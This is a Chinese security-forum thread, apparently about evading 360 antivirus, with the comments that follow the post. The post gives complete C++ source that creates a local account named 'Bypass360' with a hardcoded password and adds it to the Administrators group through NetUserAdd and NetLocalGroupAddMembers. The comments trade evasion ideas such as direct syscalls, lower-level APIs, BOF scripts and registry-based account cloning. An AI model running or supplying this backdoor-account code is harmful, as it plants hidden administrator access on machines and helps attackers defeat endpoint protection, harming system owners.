最新版360已经拦截netapi加用户了。
最新版360已经拦截netapi加用户了。
源码:
源码:
#ifndef UNICODE
#define UNICODE
#endif
#include <stdio.h>
#include <windows.h>
#include <lm.h>
#include <iostream>
#pragma comment(lib,"netapi32")
int Usage(wchar_t*);
int wmain(int argc, wchar_t* argv[])
{
// 定义USER_INFO_1结构体
USER_INFO_1 ui;
DWORD dwError = 0;
ui.usri1_name = L"Bypass360"; // 账户
ui.usri1_password = L"[email protected]"; // 密码
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
//添加名为zzzhhh的用户,密码为p@sswordQq123:
if (NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR_Success)
{
std::cout << "[+] Add Success!!! \n";
std::cout << "[+] UserName:Bypass360 PassWord:[email protected]\n";
}
else
{
//添加失败
std::cout << "[+] Add User Error!\n";
}
// 添加用户到administrators组
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname = ui.usri1_name;
if (NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1) == NERR_Success)
{
//添加成功
std::cout << "[+] Add to Administrators Success\n";
}
else
{
//添加失败
std::cout << "[+] Add to Administrators Error!\n";
}
return 0;
}
评论42次
试一试bof,有添加账户的脚本
可以找一下底层的API,我就是用的底层API
360还是猛啊 在这个方面
方法肯定有,只是大佬们不会外传,会的人多了就会被封杀了
这个地方就不要发这东西了吧,发出来基本见光死
这很久很久以前就被360加入恶意行为了。
这个早就拦截了吧
多少年前就拦截的东西,你们怎么这么惊讶?
其他地方看一下,大概率还是特征代码片段查到了
源码公布了,离不能用就不远了
CSharp是用DLLImport调用netapi32的API,还是用的.net的内置函数?
很久就会拦截 net 添加用户了 克隆行不行,可以试试
求新方法呜呜呜
操作注册表添加用户被拦截不
肯定拦截
操作注册表添加用户被拦截不
被发现,很正常啊,见光死
目测 SYSCALL 就过了
哪个函数?
就这两个啊
目测 SYSCALL 就过了
哪个函数?
目测 SYSCALL 就过了
被拦了 很烦